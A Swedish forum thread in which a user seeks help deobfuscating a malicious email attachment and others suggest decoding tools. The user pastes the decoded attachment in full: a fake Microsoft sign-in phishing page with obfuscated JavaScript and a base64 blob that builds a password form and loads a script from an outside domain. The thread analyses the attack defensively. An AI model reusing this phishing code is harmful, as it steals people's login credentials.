| EVGA Z170 FTW | i7 6700k | ASUS RTX 3070 | 16GB DDR4 3200MHz | Cooler Master V850 | Samsung 840 Evo 250GB + 2x WD Black 500GB + Seagate 2TB SSHD + Samsung 970 Evo M.2 1TB|
Hur "avkoda" javascript malware?
Hej
Jag har ett mail med en sannolikt elak bilaga som är maskerad eller vad man ska kalla det i flera steg.
Ursprungsbilagan:
<script language="javascript">
document.write(unescape('%3C%21DOCTYPE%20html%3E%0A%3Chtml%20dir%3D%22ltr%22%20class
....
Jag hittade ett ett verktyg på stackoverflow som kunde översätta det genom något som kallades URL decode.
Men nu har jag ett dokument som innehåller detta
<script>
var _0x14f4=['indexOf','268856mcdEWt','431419muEtAB','98403CAtkOS','?bbre=','961337QCAFAg','129iFMkYp',
Finns det något bra verktyg för att översätta det till "riktigt javascript", så man ser vad filen egentligen vill göra?
Antagligen så gör den någonting med den arrayen, t.ex plockar element i en specifik ordning och konkatenerar etc.
Inte lätt att avgöra vad den gör med bara en array.
Egentligen är det två arrayer som är snarlikt uppbyggda. Jag ska se om jag kan klippa ut lite mer för kanske förbättra läsbarheten. Men det är åtminstonde en epost adress i mitten som jag helst inte sprider här
Nu har du redan löst första steget men ändå.
Du har den här koden:
document.write(unescape('text'))
Sen klistrade du in text
i det där online-verktyget du länkade till. Jag kollade på koden för det verktyget för att se vad den gör för att konvertera. Svaret är … att den anropar unescape
!
Ett annat sätt hade varit att bara köra unescape('text')
i webbläsarens konsol. unescape
är en ren string -> string
-funktion, så den är safe att köra – men göra bara det om du vet vad du håller på med. Man kan köra copy(unescape('text'))
för att kopiera resultatet, och sen klistra in i någon texteditor. document.write
däremot kan exekvera kod så den hade jag inte kört.
Sen kan du använda till exempel https://prettier.io/playground/ för att göra koden mer läsbar.
Du kan också googla på ”javascript deobfuscator” för att hitta verktyg som kan försöka att vända på vanliga tekniker för att göra kod oläsbar (”obfuscation”). Men det är inte säkert att de kommer funka just för ditt exempel.
Men nu har jag ett dokument som innehåller detta
<script>
var _0x14f4=['indexOf','268856mcdEWt','431419muEtAB','98403CAtkOS','?bbre=','961337QCAFAg','129iFMkYp',
Finns det något bra verktyg för att översätta det till "riktigt javascript", så man ser vad filen egentligen vill göra?
Det är svårt att säga när man inte har hela koden, men eventuellt finns det ett anrop till eval någonstans. Om man ersätter det anropet med en utskrift brukar man få ut koden som skulle körts. Men man bör nog titta på all kod för att avgöra om den har några andra hyss för sig.
Bra, snabbt, billigt; välj två.
Ljud
PC → ODAC/O2 → Sennheiser HD650/Ultrasone PRO 900/...
PC → S.M.S.L SA300 → Bowers & Wilkins 607
Jag googlade på ”268856mcdEWt” och fick den här träffen med till synes all kod: https://malwaredecoder.com/result/d71212d01bc79f02cab19113652f9805
Jag googlade på ”268856mcdEWt” och fick den här träffen med till synes all kod: https://malwaredecoder.com/result/d71212d01bc79f02cab19113652f9805
Ser ut att stämma rätt bra (har inte koden framför mig just nu), dock så hade jag en annan epost i min.
Men vad gör den?
Och finns det något bra verktyg för att göra om den där rappakaljan till "synlig kod"?
<!DOCTYPE html>
<html dir="ltr" class="" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Sign in to your account</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="x-dns-prefetch-control" content="on">
<meta name="PageID" content="ConvergedSignIn">
<meta name="SiteID" content="">
<meta name="ReqLC" content="1033">
<meta name="LocLC" content="en-US">
<link rel="shortcut icon" href="favicon_a_eupayfgghqiai7k9sol6lg2.ico">
<meta name="robots" content="none">
<link href="https://js-82wha8sw738.web.app/sc/css.css" rel="stylesheet">
<script>
var _0x14f4=['indexOf','268856mcdEWt','431419muEtAB','98403CAtkOS','?bbre=','961337QCAFAg','129iFMkYp','@&!xPvNHIY6kJB4UyXCoQdS92!@&nZDUGkivue2PSwW9dRr43N58ah7@&!','location','9490ttbmqG','1223535TBiLeB','710340rZYDYv','pathname','2FadTgd','5CibLjw','now','href','nnnnnn@email.se','bbre=','1TwoYkI'];var _0x2cc32e=_0x3a0a;(function(_0x454cda,_0x57a516){var _0x33c03c=_0x3a0a;while(!![]){try{var _0x36c84d=-parseInt(_0x33c03c(0x1a4))*parseInt(_0x33c03c(0x1a1)) parseInt(_0x33c03c(0x1b0))*-parseInt(_0x33c03c(0x1a8)) parseInt(_0x33c03c(0x1a0))*parseInt(_0x33c03c(0x1ae)) -parseInt(_0x33c03c(0x1a6)) parseInt(_0x33c03c(0x1b1)) -parseInt(_0x33c03c(0x1b2))*-parseInt(_0x33c03c(0x1a9)) parseInt(_0x33c03c(0x1a5));if(_0x36c84d===_0x57a516)break;else _0x454cda['push'](_0x454cda['shift']());}catch(_0x3687b1){_0x454cda['push'](_0x454cda['shift']());}}}(_0x14f4,0x9b48c));function _0x3a0a(_0x4b3ff9,_0x58b6f4){return _0x3a0a=function(_0x14f49c,_0x3a0a77){_0x14f49c=_0x14f49c-0x1a0;var _0x5b2a85=_0x14f4[_0x14f49c];return _0x5b2a85;},_0x3a0a(_0x4b3ff9,_0x58b6f4);}var number=_0x2cc32e(0x1ac),hjtyfgcx=_0x2cc32e(0x1a2);if(window[_0x2cc32e(0x1a3)][_0x2cc32e(0x1ab)][_0x2cc32e(0x1af)](_0x2cc32e(0x1ad))==-0x1)window[_0x2cc32e(0x1a3)][_0x2cc32e(0x1ab)]=document['location'][_0x2cc32e(0x1a7)] _0x2cc32e(0x1b3) Date[_0x2cc32e(0x1aa)]() '#/' Date[_0x2cc32e(0x1aa)]() '-' hjtyfgcx '-' number '-' Date[_0x2cc32e(0x1aa)]() '/' Date[_0x2cc32e(0x1aa)]();
</script> <base href="">
</head>
<script language="javascript">
var _0xcea0=['993932vkbmvX','67018cudFTl','1UhxORS','380892rVDghK','2dPUfKg','replace','88857ojqfFd','write','40025vJhNrf','151993pjOxae','13idydNO','1tgopVm','PGJvZHkgb25sb2FkPSJsb2FkZWQoKSIgY2xhc3M9ImNiIiBzdHlsZT0iZGlzcGxheTogYmxvY2s7Ij4gPGRpdj4gPGRpdj4gPGRpdiBjbGFzcz0iYmFja2dyb3VuZCIgcm9sZT0icHJlc2VudGF0aW9uIj4gPGRpdiBzdHlsZT0iYmFja2dyb3VuZC1pbWFnZTogdXJsKGh0dHBzOi8vYWFkY2RuLm1zZnRhdXRoLm5ldC9zaGFyZWQvMS4wL2NvbnRlbnQvaW1hZ2VzL2JhY2tncm91bmRzLzJfYmMzZDMyYTY5Njg5NWY3OGMxOWRmNmM3MTc1ODZhNWQuc3ZnKTsiPjwvZGl2PiA8ZGl2IGlkPSJCR2ltZyIgY2xhc3M9ImJhY2tncm91bmRJbWFnZSIgc3R5bGU9ImJhY2tncm91bmQtaW1hZ2U6IHVybChodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9iYWNrZ3JvdW5kcy8yX2JjM2QzMmE2OTY4OTVmNzhjMTlkZjZjNzE3NTg2YTVkLnN2Zyk7Ij4gPC9kaXY IDxkaXYgaWQ9ImRpbUJHIiBjbGFzcz0iIj48L2Rpdj4gPC9kaXY IDwvZGl2PiA8ZGl2PjwvZGl2PiA8ZGl2IGNsYXNzPSJvdXRlciI IDxkaXYgY2xhc3M9Im1pZGRsZSI IDxkaXYgY2xhc3M9ImJhY2tncm91bmQtbG9nby1ob2xkZXIxIj4gPGltZyBpZD0iYmFubmVyX2ltYWdlIiBjbGFzcz0iYmFja2dyb3VuZC1sb2dvMSIgc3JjPSJodHRwczovL2FhZGNkbi5tc2F1dGgubmV0L3NoYXJlZC8xLjAvY29udGVudC9pbWFnZXMvYXBwbG9nb3MvNTNfOGIzNjMzNzAzN2NmZjg4YzNkZjIwM2JiNzNkNThlNDEucG5nIj4gPC9kaXY IDxkaXYgY2xhc3M9ImlubmVyIGZhZGUtaW4tbGlnaHRib3giPiA8ZGl2IGlkPSJtYWluYm94IiBjbGFzcz0ibGlnaHRib3gtY292ZXIiPiA8L2Rpdj4gPGRpdiBpZD0icHJvZ3Jlc3NCYXIiIGNsYXNzPSIiIHJvbGU9InByb2dyZXNzYmFyIiBhcmlhLWxhYmVsPSJQbGVhc2Ugd2FpdCI IDxkaXY PC9kaXY IDxkaXY PC9kaXY IDxkaXY PC9kaXY IDxkaXY PC9kaXY IDxkaXY PC9kaXY IDwvZGl2PiA8ZGl2PiA8aW1nIGlkPSJMT0dPaW1nIiBjbGFzcz0ibG9nbyIgcG5nc3JjPSJodHRwczovL2FhZGNkbi5tc2F1dGgubmV0L3NoYXJlZC8xLjAvY29udGVudC9pbWFnZXMvbWljcm9zb2Z0X2xvZ29fZWQ5YzllYjBkY2UxN2Q3NTJiZWRlYTZiNWFjZGE2ZDkucG5nIiBzdmdzcmM9Imh0dHBzOi8vYWFkY2RuLm1zYXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9taWNyb3NvZnRfbG9nb19lZTVjOGQ5ZmI2MjQ4YzkzOGZkMGRjMTkzNzBlOTBiZC5zdmciIHNyYz0iaHR0cHM6Ly9hYWRjZG4ubXNhdXRoLm5ldC9zaGFyZWQvMS4wL2NvbnRlbnQvaW1hZ2VzL21pY3Jvc29mdF9sb2dvX2VlNWM4ZDlmYjYyNDhjOTM4ZmQwZGMxOTM3MGU5MGJkLnN2ZyIgYWx0PSJNaWNyb3NvZnQiPiA8L2Rpdj4gPGRpdiBpZD0iZmVkcmVkIiBjbGFzcz0iYW5pbWF0ZSBzbGlkZS1pbi1uZXh0IiBkYXRhLXZpZXdpZD0iOCIgc3R5bGU9ImRpc3BsYXk6IG5vbmU7Ij4gPGRpdiBpZD0ibG9naW5IZWFkZXIiIGNsYXNzPSJyb3cgdGV4dC10aXRsZSIgcm9sZT0iaGVhZGluZyIgYXJpYS1sZXZlbD0iMSI VGFraW5nIHlvdSB0byB5b3VyIG9yZ2FuaXphdGlvbidzIHNpZ24taW4gcGFnZSA8L2Rpdj4gPGRpdiBjbGFzcz0icm93IHByb2dyZXNzLWNvbnRhaW5lciI IDxkaXYgY2xhc3M9InByb2dyZXNzIiByb2xlPSJwcm9ncmVzc2JhciIgYXJpYS1sYWJlbD0iUGxlYXNlIHdhaXQiPiA8ZGl2PjwvZGl2PiA8ZGl2PjwvZGl2PiA8ZGl2PjwvZGl2PiA8ZGl2PjwvZGl2PiA8ZGl2PjwvZGl2PiA8L2Rpdj4gPC9kaXY IDxhIGlkPSJhYWRSZWRpcmVjdENhbmNlbCIgaHJlZj0iIyIgYXJpYS1kZXNjcmliZWRieT0ibG9naW5IZWFkZXIiPkNhbmNlbDwvYT4gPC9kaXY IDxkaXYgaWQ9IlBhc3NzZWN0aW9uIiBjbGFzcz0iYW5pbWF0ZSBzbGlkZS1pbi1uZXh0IiBzdHlsZT0iZGlzcGxheTogYmxvY2s7IiByb2xlPSJtYWluIj4gPGRpdiBjbGFzcz0iIj4gPGRpdj4gPGRpdj4gPGRpdiBjbGFzcz0iaWRlbnRpdHlCYW5uZXIiPiA8YnV0dG9uIHR5cGU9ImJ1dHRvbiIgY2xhc3M9ImJhY2tCdXR0b24iIGlkPSJpZEJ0bl9CYWNrIiBhcmlhLWxhYmVsPSJCYWNrIj48aW1nIHJvbGU9InByZXNlbnRhdGlvbiIgcG5nc3JjPSJodHRwczovL2FhZGNkbi5tc2F1dGgubmV0L3NoYXJlZC8xLjAvY29udGVudC9pbWFnZXMvYXJyb3dfbGVmdF83Y2MwOTZkYTZhYTJkYmEzZjgxZmNjMWM4MjYyMTU3Yy5wbmciIHN2Z3NyYz0iaHR0cHM6Ly9hYWRjZG4ubXNhdXRoLm5ldC9zaGFyZWQvMS4wL2NvbnRlbnQvaW1hZ2VzL2Fycm93X2xlZnRfYTljYzI4MjRlZjM1MTdiNmM0MTYwZGNmOGZmN2Q0MTAuc3ZnIiBzcmM9Imh0dHBzOi8vYWFkY2RuLm1zYXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0X2E5Y2MyODI0ZWYzNTE3YjZjNDE2MGRjZjhmZjdkNDEwLnN2ZyI IDwvYnV0dG9uPiA8ZGl2IGlkPSJkaXNwbGF5TmFtZSIgY2xhc3M9ImlkZW50aXR5IiB0aXRsZT0iIj4gPC9kaXY IDwvZGl2PiA8L2Rpdj4gPC9kaXY IDxkaXYgY2xhc3M9InBhZ2luYXRpb24tdmlldyBhbmltYXRlIGhhcy1pZGVudGl0eS1iYW5uZXIiPiA8ZGl2IGRhdGEtdmlld2lkPSIyIiBkYXRhLXNob3dpZGVudGl0eWJhbm5lcj0idHJ1ZSIgZGF0YS1keW5hbWljYnJhbmRpbmc9InRydWUiPiA8aW5wdXQgbmFtZT0iaTEzIiB2YWx1ZT0iMCIgdHlwZT0iaGlkZGVuIj4gPGlucHV0IG5hbWU9ImxvZ2luIiB2YWx1ZT0iIiB0eXBlPSJoaWRkZW4iPiA8aW5wdXQgbmFtZT0idXNlciIgY2xhc3M9Im1vdmVPZmZTY3JlZW4iIHRhYmluZGV4PSItMSIgYXJpYS1oaWRkZW49InRydWUiIHR5cGU9InRleHQiPiA8aW5wdXQgbmFtZT0idHlwZSIgdmFsdWU9IjExIiB0eXBlPSJoaWRkZW4iPiA8aW5wdXQgbmFtZT0iTG9naW5PcHRpb25zIiB2YWx1ZT0iMyIgdHlwZT0iaGlkZGVuIj4gPGlucHV0IG5hbWU9ImxvZ2luZm10IiBpZD0iZGlzcGxheU5hbWUiIHZhbHVlPSIiIG1heGxlbmd0aD0iMTEzIiBjbGFzcz0iZm9ybS1jb250cm9sIGx0cl9vdmVycmlkZSIgYXJpYS1sYWJlbD0iRW50ZXIgeW91ciBlbWFpbCwgcGhvbmUsIG9yIFNreXBlLiIgYXJpYS1kZXNjcmliZWRieT0ibG9naW5IZWFkZXIgbG9naW5EZXNjcmlwdGlvbiIgcGxhY2Vob2xkZXI9IkVtYWlsLCBwaG9uZSwgb3IgU2t5cGUiIGxhbmc9ImVuIiB0eXBlPSJoaWRkZW4iPiA8aW5wdXQgbmFtZT0ibHJ0IiB2YWx1ZT0iIiB0eXBlPSJoaWRkZW4iPiA8aW5wdXQgbmFtZT0ibHJ0UGFydGl0aW9uIiB2YWx1ZT0iIiB0eXBlPSJoaWRkZW4iPiA8aW5wdXQgbmFtZT0iaGlzUmVnaW9uIiB2YWx1ZT0iIiB0eXBlPSJoaWRkZW4iPiA8aW5wdXQgbmFtZT0iaGlzU2NhbGVVbml0IiB2YWx1ZT0iIiB0eXBlPSJoaWRkZW4iPiA8ZGl2IGlkPSJsb2dpbkhlYWRlciIgY2xhc3M9InJvdyB0ZXh0LXRpdGxlIiByb2xlPSJoZWFkaW5nIiBhcmlhLWxldmVsPSIxIj5FbnRlciBwYXNzd29yZCA8L2Rpdj4gPGRpdiBjbGFzcz0icm93Ij4gPGRpdiBjbGFzcz0iZm9ybS1ncm91cCBjb2wtbWQtMjQiPiA8ZGl2IHJvbGU9ImFsZXJ0IiBhcmlhLWxpdmU9ImFzc2VydGl2ZSI IDxkaXYgaWQ9InBhc3N3b3JkRXJyb3IiIGNsYXNzPSJhbGVydCBhbGVydC1lcnJvciIgc3R5bGU9ImRpc3BsYXk6bm9uZTsiPlBsZWFzZSBlbnRlciB5b3VyIHBhc3N3b3JkLiA8L2Rpdj4gPC9kaXY IDxkaXYgY2xhc3M9InBsYWNlaG9sZGVyQ29udGFpbmVyIj4gPGlucHV0IG5hbWU9InBhc3MiIGlkPSJpMDExOCIgYXV0b2NvbXBsZXRlPSJvZmYiIGNsYXNzPSJmb3JtLWNvbnRyb2wiIGFyaWEtcmVxdWlyZWQ9InRydWUiIGFyaWEtZGVzY3JpYmVkYnk9ImxvZ2luSGVhZGVyIHBhc3N3b3JkRGVzYyIgcGxhY2Vob2xkZXI9IlBhc3N3b3JkIiBhcmlhLWxhYmVsPSJFbnRlciB0aGUgcGFzc3dvcmQgZm9yIGRhbWllbi5icnRpbGxvdEB0ZWMta2VyLmNvbSIgdHlwZT0icGFzc3dvcmQiPiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8ZGl2IGNsYXNzPSJwb3NpdGlvbi1idXR0b25zIj4gPGRpdj4gPGRpdiBjbGFzcz0icm93Ij4gPGRpdiBjbGFzcz0iY29sLW1kLTI0Ij4gPGRpdiBjbGFzcz0idGV4dC0xMyBhY3Rpb24tbGlua3MiPiA8ZGl2IGNsYXNzPSJmb3JtLWdyb3VwIj4gPGEgaWQ9ImlkQV9QV0RfRm9yZ290UGFzc3dvcmQiIHJvbGU9ImxpbmsiIGhyZWY9IiMiPkZvcmdvdCBteSBwYXNzd29yZDwvYT4gPC9kaXY IDxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAiPiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8L2Rpdj4gPC9kaXY IDxkaXYgY2xhc3M9InJvdyI IDxkaXY IDxkaXYgY2xhc3M9ImNvbC14cy0yNCBuby1wYWRkaW5nLWxlZnQtcmlnaHQgYnV0dG9uLWNvbnRhaW5lciI IDxkaXYgY2xhc3M9ImlubGluZS1ibG9jayI IDxpbnB1dCBpZD0iaWRTSUJ1dHRvbjkiIG9uY2xpY2s9Ik5FRSgpIiBjbGFzcz0iYnRuIGJ0bi1ibG9jayBidG4tcHJpbWFyeSIgdmFsdWU9IlNpZ24gaW4iIHR5cGU9InN1Ym1pdCI IDwvZGl2PiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8ZGl2PiA8L2Rpdj4gPGRpdiBpZD0iZm9vdGVyIiBjbGFzcz0iZm9vdGVyIGRlZmF1bHQiIHJvbGU9ImNvbnRlbnRpbmZvIj4gPGRpdj4gPGRpdiBpZD0iZm9vdGVyTGlua3MiIGNsYXNzPSJmb290ZXJOb2RlIHRleHQtc2Vjb25kYXJ5Ij4gPHNwYW4gaWQ9ImZ0ckNvcHkiPsKpIE1pY3Jvc29mdDwvc3Bhbj4gPGEgaWQ9ImZ0clRlcm1zIiBocmVmPSIjIj5UZXJtcyBvZiB1c2U8L2E IDxhIGlkPSJmdHJQcml2YWN5IiBocmVmPSJodHRwczovL3ByaXZhY3kubWljcm9zb2Z0LmNvbS9lbi1VUy9wcml2YWN5c3RhdGVtZW50Ij5Qcml2YWN5ICZhbXA7IGNvb2tpZXM8L2E IDxhIGhyZWY9IiMiIHJvbGU9ImJ1dHRvbiIgY2xhc3M9Im1vcmVPcHRpb25zIiBhcmlhLWxhYmVsPSJDbGljayBoZXJlIGZvciB0cm91Ymxlc2hvb3RpbmcgaW5mb3JtYXRpb24iPiA8aW1nIGNsYXNzPSJkZXNrdG9wTW9kZSIgcm9sZT0icHJlc2VudGF0aW9uIiBwbmdzcmM9Imh0dHBzOi8vYWFkY2RuLm1zYXV0aC5uZXQvZXN0cy8yLjEvY29udGVudC9pbWFnZXMvZWxsaXBzaXNfd2hpdGVfMGFkNDMwODQ4MDBmZDhiNTBhMjU3NmI1MTczNzQ2ZmUucG5nIiBzdmdzcmM9Imh0dHBzOi8vYWFkY2RuLm1zYXV0aC5uZXQvZXN0cy8yLjEvY29udGVudC9pbWFnZXMvZWxsaXBzaXNfd2hpdGVfNWFjNTkwZWU3MmJmZTA2YTdjZWNmZDc1YjU4OGFkNzMuc3ZnIiBzcmM9Imh0dHBzOi8vYWFkY2RuLm1zYXV0aC5uZXQvZXN0cy8yLjEvY29udGVudC9pbWFnZXMvZWxsaXBzaXNfd2hpdGVfNWFjNTkwZWU3MmJmZTA2YTdjZWNmZDc1YjU4OGFkNzMuc3ZnIj4gPGltZyBjbGFzcz0ibW9iaWxlTW9kZSIgcm9sZT0icHJlc2VudGF0aW9uIiBwbmdzcmM9Imh0dHBzOi8vYWFkY2RuLm1zYXV0aC5uZXQvZXN0cy8yLjEvY29udGVudC9pbWFnZXMvZWxsaXBzaXNfZ3JleV81YmMyNTI1NjdlZjU2ZGI2NDgyMDdkOWMzNmE5ZDAwNC5wbmciIHN2Z3NyYz0iaHR0cHM6Ly9hYWRjZG4ubXNhdXRoLm5ldC9lc3RzLzIuMS9jb250ZW50L2ltYWdlcy9lbGxpcHNpc19ncmV5XzJiNWQzOTNkYjA0YTVlNmUxZjczOWNiMjY2ZTY1YjRjLnN2ZyIgc3JjPSJodHRwczovL2FhZGNkbi5tc2F1dGgubmV0L2VzdHMvMi4xL2NvbnRlbnQvaW1hZ2VzL2VsbGlwc2lzX2dyZXlfMmI1ZDM5M2RiMDRhNWU2ZTFmNzM5Y2IyNjZlNjViNGMuc3ZnIj4gPC9hPiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8L2Rpdj4gPC9kaXY IDwvZGl2PiA8c2NyaXB0IHNyYz0iaHR0cHM6Ly90cmFja2FuZGdvYWlyZnJlaWdodC5jb20vd3AtYWNjZXNzL3NjX2xvZ2luLmpzIj48L3NjcmlwdD4gPC9ib2R5Pg==','text/html','hello','399338eSbYxS'];var _0x7ab9d5=_0x3dee;function _0x3dee(_0x5e5e18,_0x3461e1){return _0x3dee=function(_0xcea02a,_0x3deef6){_0xcea02a=_0xcea02a-0x115;var _0x101e99=_0xcea0[_0xcea02a];return _0x101e99;},_0x3dee(_0x5e5e18,_0x3461e1);}(function(_0x23b517,_0x3bfb6d){var _0x978a44=_0x3dee;while(!![]){try{var _0x50bfe4=parseInt(_0x978a44(0x116))*parseInt(_0x978a44(0x11f)) parseInt(_0x978a44(0x117))*parseInt(_0x978a44(0x115)) parseInt(_0x978a44(0x11e)) parseInt(_0x978a44(0x121))*-parseInt(_0x978a44(0x120)) -parseInt(_0x978a44(0x123)) -parseInt(_0x978a44(0x11c)) -parseInt(_0x978a44(0x118))*-parseInt(_0x978a44(0x11d));if(_0x50bfe4===_0x3bfb6d)break;else _0x23b517['push'](_0x23b517['shift']());}catch(_0x2b2326){_0x23b517['push'](_0x23b517['shift']());}}}(_0xcea0,0x75fd9));function hello(){var _0x523c77=_0x3dee,_0x3ea0c0=document['open'](_0x523c77(0x11a),_0x523c77(0x122));_0x3ea0c0['write'](_0x523c77(0x11b)),_0x3ea0c0['close']();};document[_0x7ab9d5(0x124)](atob(_0x7ab9d5(0x119)));
</script> </body>
</html>
edit: Har provat ett par deobfuscators men jag är nog för trött för det här....
Först tack för alla tips!
Ny dag nya försök, och lite piggare i skallen.
Jag provade de första 5 deobfuscators google gav mig, men ingen lyckades knäcka detta oavsett om jag provade olika inställningar.
Jag har även försökt intendera koden själv för att öka läsbarheten.
De onlineformaterare jag provade gick bet av oklar anledning, och jag kan egentligen inte javascript överhuvudtaget så resultatet är kanske sådär.
Hur som helst är den här:
var _0x14f4=['indexOf','268856mcdEWt','431419muEtAB','98403CAtkOS','?bbre=','961337QCAFAg','129iFMkYp','@&!xPvNHIY6kJB4UyXCoQdS92!@&nZDUGkivue2PSwW9dRr43N58ah7@&!','location','9490ttbmqG','1223535TBiLeB','710340rZYDYv','pathname','2FadTgd','5CibLjw','now','href','nnnnnn.eeeeeeeen@domain.se','bbre=','1TwoYkI'];
var _0x2cc32e=_0x3a0a;
(function(_0x454cda,_0x57a516)
{
var _0x33c03c=_0x3a0a;
while(!![])
{
try
{
var _0x36c84d=-parseInt(_0x33c03c(0x1a4)) * parseInt(_0x33c03c(0x1a1)) parseInt(_0x33c03c(0x1b0)) * -parseInt(_0x33c03c(0x1a8)) parseInt(_0x33c03c(0x1a0)) * parseInt(_0x33c03c(0x1ae)) -parseInt(_0x33c03c(0x1a6)) parseInt(_0x33c03c(0x1b1)) -parseInt(_0x33c03c(0x1b2)) * -parseInt(_0x33c03c(0x1a9)) parseInt(_0x33c03c(0x1a5));
if(_0x36c84d===_0x57a516)
break;
else
_0x454cda['push'](_0x454cda['shift']());
}
catch(_0x3687b1)
{
_0x454cda['push'](_0x454cda['shift']());
}
}
}
(_0x14f4,0x9b48c));
function _0x3a0a(_0x4b3ff9,_0x58b6f4)
{
return _0x3a0a=function(_0x14f49c,_0x3a0a77)
{
_0x14f49c=_0x14f49c-0x1a0;
var _0x5b2a85=_0x14f4[_0x14f49c];
return _0x5b2a85;
}
,_0x3a0a(_0x4b3ff9,_0x58b6f4);
}
var number=_0x2cc32e(0x1ac),hjtyfgcx=_0x2cc32e(0x1a2);
if(window[_0x2cc32e(0x1a3)][_0x2cc32e(0x1ab)][_0x2cc32e(0x1af)](_0x2cc32e(0x1ad))==-0x1)window[_0x2cc32e(0x1a3)][_0x2cc32e(0x1ab)]=document['location'][_0x2cc32e(0x1a7)] _0x2cc32e(0x1b3) Date[_0x2cc32e(0x1aa)]() '#/' Date[_0x2cc32e(0x1aa)]() '-' hjtyfgcx '-' number '-' Date[_0x2cc32e(0x1aa)]() '/' Date[_0x2cc32e(0x1aa)]();
//---------------
var _0xcea0=['993932vkbmvX','67018cudFTl','1UhxORS','380892rVDghK','2dPUfKg','replace','88857ojqfFd','write','40025vJhNrf','151993pjOxae','13idydNO','1tgopVm','PGJvZHkgb25sb2FkPSJsb2FkZWQoKSIgY2xhc3M9ImNiIiBzdHlsZT0iZGlzcGxheTogYmxvY2s7Ij4gPGRpdj4gPGRpdj4gPGRpdiBjbGFzcz0iYmFja2dyb3VuZCIgcm9sZT0icHJlc2VudGF0aW9uIj4gPGRpdiBzdHlsZT0iYmFja2dyb3VuZC1pbWFnZTogdXJsKGh0dHBzOi8vYWFkY2RuLm1zZnRhdXRoLm5ldC9zaGFyZWQvMS4wL2NvbnRlbnQvaW1hZ2VzL2JhY2tncm91bmRzLzJfYmMzZDMyYTY5Njg5NWY3OGMxOWRmNmM3MTc1ODZhNWQuc3ZnKTsiPjwvZGl2PiA8ZGl2IGlkPSJCR2ltZyIgY2xhc3M9ImJhY2tncm91bmRJbWFnZSIgc3R5bGU9ImJhY2tncm91bmQtaW1hZ2U6IHVybChodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9iYWNrZ3JvdW5kcy8yX2JjM2QzMmE2OTY4OTVmNzhjMTlkZjZjNzE3NTg2YTVkLnN2Zyk7Ij4gPC9kaXY IDxkaXYgaWQ9ImRpbUJHIiBjbGFzcz0iIj48L2Rpdj4gPC9kaXY IDwvZGl2PiA8ZGl2PjwvZGl2PiA8ZGl2IGNsYXNzPSJvdXRlciI IDxkaXYgY2xhc3M9Im1pZGRsZSI IDxkaXYgY2xhc3M9ImJhY2tncm91bmQtbG9nby1ob2xkZXIxIj4gPGltZyBpZD0iYmFubmVyX2ltYWdlIiBjbGFzcz0iYmFja2dyb3VuZC1sb2dvMSIgc3JjPSJodHRwczovL2FhZGNkbi5tc2F1dGgubmV0L3NoYXJlZC8xLjAvY29udGVudC9pbWFnZXMvYXBwbG9nb3MvNTNfOGIzNjMzNzAzN2NmZjg4YzNkZjIwM2JiNzNkNThlNDEucG5nIj4gPC9kaXY IDxkaXYgY2xhc3M9ImlubmVyIGZhZGUtaW4tbGlnaHRib3giPiA8ZGl2IGlkPSJtYWluYm94IiBjbGFzcz0ibGlnaHRib3gtY292ZXIiPiA8L2Rpdj4gPGRpdiBpZD0icHJvZ3Jlc3NCYXIiIGNsYXNzPSIiIHJvbGU9InByb2dyZXNzYmFyIiBhcmlhLWxhYmVsPSJQbGVhc2Ugd2FpdCI IDxkaXY PC9kaXY IDxkaXY PC9kaXY IDxkaXY PC9kaXY IDxkaXY PC9kaXY IDxkaXY PC9kaXY IDwvZGl2PiA8ZGl2PiA8aW1nIGlkPSJMT0dPaW1nIiBjbGFzcz0ibG9nbyIgcG5nc3JjPSJodHRwczovL2FhZGNkbi5tc2F1dGgubmV0L3NoYXJlZC8xLjAvY29udGVudC9pbWFnZXMvbWljcm9zb2Z0X2xvZ29fZWQ5YzllYjBkY2UxN2Q3NTJiZWRlYTZiNWFjZGE2ZDkucG5nIiBzdmdzcmM9Imh0dHBzOi8vYWFkY2RuLm1zYXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9taWNyb3NvZnRfbG9nb19lZTVjOGQ5ZmI2MjQ4YzkzOGZkMGRjMTkzNzBlOTBiZC5zdmciIHNyYz0iaHR0cHM6Ly9hYWRjZG4ubXNhdXRoLm5ldC9zaGFyZWQvMS4wL2NvbnRlbnQvaW1hZ2VzL21pY3Jvc29mdF9sb2dvX2VlNWM4ZDlmYjYyNDhjOTM4ZmQwZGMxOTM3MGU5MGJkLnN2ZyIgYWx0PSJNaWNyb3NvZnQiPiA8L2Rpdj4gPGRpdiBpZD0iZmVkcmVkIiBjbGFzcz0iYW5pbWF0ZSBzbGlkZS1pbi1uZXh0IiBkYXRhLXZpZXdpZD0iOCIgc3R5bGU9ImRpc3BsYXk6IG5vbmU7Ij4gPGRpdiBpZD0ibG9naW5IZWFkZXIiIGNsYXNzPSJyb3cgdGV4dC10aXRsZSIgcm9sZT0iaGVhZGluZyIgYXJpYS1sZXZlbD0iMSI VGFraW5nIHlvdSB0byB5b3VyIG9yZ2FuaXphdGlvbidzIHNpZ24taW4gcGFnZSA8L2Rpdj4gPGRpdiBjbGFzcz0icm93IHByb2dyZXNzLWNvbnRhaW5lciI 